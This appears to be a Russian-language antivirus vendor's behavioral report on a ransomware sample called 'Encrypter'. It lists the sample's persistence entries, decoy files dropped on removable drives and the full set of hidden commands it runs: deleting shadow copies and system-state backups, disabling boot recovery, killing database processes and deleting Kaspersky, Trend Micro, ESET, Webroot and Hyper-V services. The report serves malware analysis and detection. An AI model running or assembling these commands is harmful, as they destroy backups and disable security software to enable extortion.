Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Encrypter_074' = '%APPDATA%\info.exe'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'userinfo' = '%APPDATA%\recovery.txt'
- [<HKCU>\Software\Classes\.guesswho\shell\open\command] '' = 'notepad.exe %APPDATA%\recovery.txt'
Создает следующие файлы на съемном носителе
- <Имя диска съемного носителя>:\how recovery files.txt
- <Имя диска съемного носителя>:\grupposupp@protonmail.ch.url
- <Имя диска съемного носителя>:\price030215.zip
- <Имя диска съемного носителя>:\productos.zip
- <Имя диска съемного носителя>:\contractualdeadlines.zip
- <Имя диска съемного носителя>:\fiche_inscription_2015.zip
- <Имя диска съемного носителя>:\2013_smccc_competition_points_jul2013.xlsx
Вредоносные функции
Для затруднения выявления своего присутствия в системе
удаляет теневые копии разделов.
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\syswow64\cmd.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\info.exe
- %APPDATA%\recovery.txt
- %APPDATA%\grupposupp@protonmail.ch.url
- <Текущая директория>\how recovery files.txt
- <Текущая директория>\grupposupp@protonmail.ch.url
- D:\how recovery files.txt
- D:\grupposupp@protonmail.ch.url
- %HOMEPATH%\videos\how recovery files.txt
- %HOMEPATH%\videos\grupposupp@protonmail.ch.url
- %HOMEPATH%\how recovery files.txt
- %HOMEPATH%\grupposupp@protonmail.ch.url
- %HOMEPATH%\saved games\how recovery files.txt
- %HOMEPATH%\saved games\grupposupp@protonmail.ch.url
Перемещает следующие файлы
- %HOMEPATH%\saved games\grupposupp@protonmail.ch.url в %HOMEPATH%\saved games\hfko2quqas.guesswho
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "Hyper-V"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im msmdsrv.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlservr.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlwriter.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlbrowser.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' rem Kill "SQL"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "UniFi"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "ofcservice"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "ntrtscan"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmProxy"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "tmlisten"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "VSApiNt"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlceip.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMiCRCScanService"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMSmartRelayService"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmPreFilter"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "tmusa"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMLWCSService"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmFilter"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Trend Micro"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "kltap"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "KSDE1.0.0"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmCCSF"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "postgresql-x64-9.4"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im fdlauncher.exe' (со скрытым окном)
- '%WINDIR%\syswow64\wbem\wmic.exe' wmic SHADOWCOPY DELETE' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c wmic SHADOWCOPY DELETE' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c wbadmin DELETE SYSTEMSTATEBACKUP' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c bcdedit.exe /set {default} recoveryenabled No' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin.exe Delete Shadows /All /Quiet' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' TASKKILL /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' vssadmin.exe Delete Shadows /All /Quiet' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klhk"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im MsDtsSrvr.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im UniFi.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' rem Kill' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im postgres.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im pg_ctl.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im msftesql.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im ReportingServicesService.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im fdhost.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im SQLAGENT.EXE' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im Ssms.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klmouflt"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klkbdflt"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klbackupflt"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLSERVER"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$VEEAMSQL2012"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$VEEAMSQL2012"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLWriter"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SSISTELEMETRY130"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MsDtsServer130"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLTELEMETRY"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLBrowser"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC MINUTE /TN Encrypter /TR %APPDATA%\info.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLServerOLAPService"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLFDLauncher"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "SQL"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicvss"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmictimesync"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "storflt"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicrdv"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicheartbeat"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicshutdown"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicguestinterface"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmickvpexchange"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLSERVERAGENT"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MsDtsServer100"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMBMServer"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "ReportServer"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klbackupdisk"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klflt"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klpd"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "KLIF"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "AVP18.0.0"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "klim6"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Kaspersky"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "ekrn"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: ESET"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLTELEMETRY$HL"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "WRSVC"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLServerADHelper100"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "msftesql$SQLEXPRESS"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "ReportServer$OPTIMA"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$OPTIMA"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$OPTIMA"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLFDLauncher$OPTIMA"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$WOLTERSKLUWER"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$PROGID"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$WOLTERSKLUWER"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$PROGID"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Webroot"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC ONLOGON /TN EncrypterSt /TR %APPDATA%\info.exe' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "Hyper-V"
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im msmdsrv.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlservr.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlwriter.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlbrowser.exe
- '%WINDIR%\syswow64\cmd.exe' rem Kill "SQL"
- '%WINDIR%\syswow64\cmd.exe' sc delete "UniFi"
- '%WINDIR%\syswow64\cmd.exe' sc delete "ofcservice"
- '%WINDIR%\syswow64\cmd.exe' sc delete "ntrtscan"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmProxy"
- '%WINDIR%\syswow64\cmd.exe' sc delete "tmlisten"
- '%WINDIR%\syswow64\cmd.exe' sc delete "VSApiNt"
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im sqlceip.exe
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMiCRCScanService"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMSmartRelayService"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmPreFilter"
- '%WINDIR%\syswow64\cmd.exe' sc delete "tmusa"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMLWCSService"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmFilter"
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Trend Micro"
- '%WINDIR%\syswow64\cmd.exe' sc delete "kltap"
- '%WINDIR%\syswow64\cmd.exe' sc delete "KSDE1.0.0"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TmCCSF"
- '%WINDIR%\syswow64\cmd.exe' sc delete "postgresql-x64-9.4"
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im fdlauncher.exe
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC MINUTE /TN Encrypter /TR %APPDATA%\info.exe
- '%WINDIR%\syswow64\cmd.exe' /c wmic SHADOWCOPY DELETE
- '%WINDIR%\syswow64\cmd.exe' /c wbadmin DELETE SYSTEMSTATEBACKUP
- '%WINDIR%\syswow64\cmd.exe' /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- '%WINDIR%\syswow64\cmd.exe' /c bcdedit.exe /set {default} recoveryenabled No
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin.exe Delete Shadows /All /Quiet
- '%WINDIR%\syswow64\cmd.exe' TASKKILL /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*"
- '%WINDIR%\syswow64\cmd.exe' vssadmin.exe Delete Shadows /All /Quiet
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET
- '%WINDIR%\syswow64\cmd.exe' sc delete "klhk"
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im MsDtsSrvr.exe
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im UniFi.exe
- '%WINDIR%\syswow64\cmd.exe' rem Kill
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im postgres.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im pg_ctl.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im msftesql.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im ReportingServicesService.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im fdhost.exe
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im SQLAGENT.EXE
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security
- '%WINDIR%\syswow64\cmd.exe' taskkill -f -im Ssms.exe
- '%WINDIR%\syswow64\cmd.exe' sc delete "klmouflt"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klkbdflt"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klbackupflt"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLSERVER"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$VEEAMSQL2012"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$VEEAMSQL2012"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLWriter"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SSISTELEMETRY130"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MsDtsServer130"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLTELEMETRY"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLBrowser"
- '%WINDIR%\syswow64\schtasks.exe' /Create /SC ONLOGON /TN EncrypterSt /TR %APPDATA%\info.exe
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLServerOLAPService"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLFDLauncher"
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "SQL"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicvss"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmictimesync"
- '%WINDIR%\syswow64\cmd.exe' sc delete "storflt"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicrdv"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicheartbeat"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicshutdown"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmicguestinterface"
- '%WINDIR%\syswow64\cmd.exe' sc delete "vmickvpexchange"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLSERVERAGENT"
- '%WINDIR%\syswow64\cmd.exe' tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot
- '%WINDIR%\syswow64\cmd.exe' sc delete "MsDtsServer100"
- '%WINDIR%\syswow64\cmd.exe' sc delete "TMBMServer"
- '%WINDIR%\syswow64\cmd.exe' sc delete "ReportServer"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klbackupdisk"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klflt"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klpd"
- '%WINDIR%\syswow64\cmd.exe' sc delete "KLIF"
- '%WINDIR%\syswow64\cmd.exe' sc delete "AVP18.0.0"
- '%WINDIR%\syswow64\cmd.exe' sc delete "klim6"
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Kaspersky"
- '%WINDIR%\syswow64\cmd.exe' sc delete "ekrn"
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: ESET"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLTELEMETRY$HL"
- '%WINDIR%\syswow64\cmd.exe' sc delete "WRSVC"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLServerADHelper100"
- '%WINDIR%\syswow64\cmd.exe' sc delete "msftesql$SQLEXPRESS"
- '%WINDIR%\syswow64\cmd.exe' sc delete "ReportServer$OPTIMA"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$OPTIMA"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$OPTIMA"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQLFDLauncher$OPTIMA"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$WOLTERSKLUWER"
- '%WINDIR%\syswow64\cmd.exe' sc delete "SQLAgent$PROGID"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$WOLTERSKLUWER"
- '%WINDIR%\syswow64\cmd.exe' sc delete "MSSQL$PROGID"
- '%WINDIR%\syswow64\cmd.exe' rem Delite Service "AV: Webroot"
- '<SYSTEM32>\vssvc.exe'
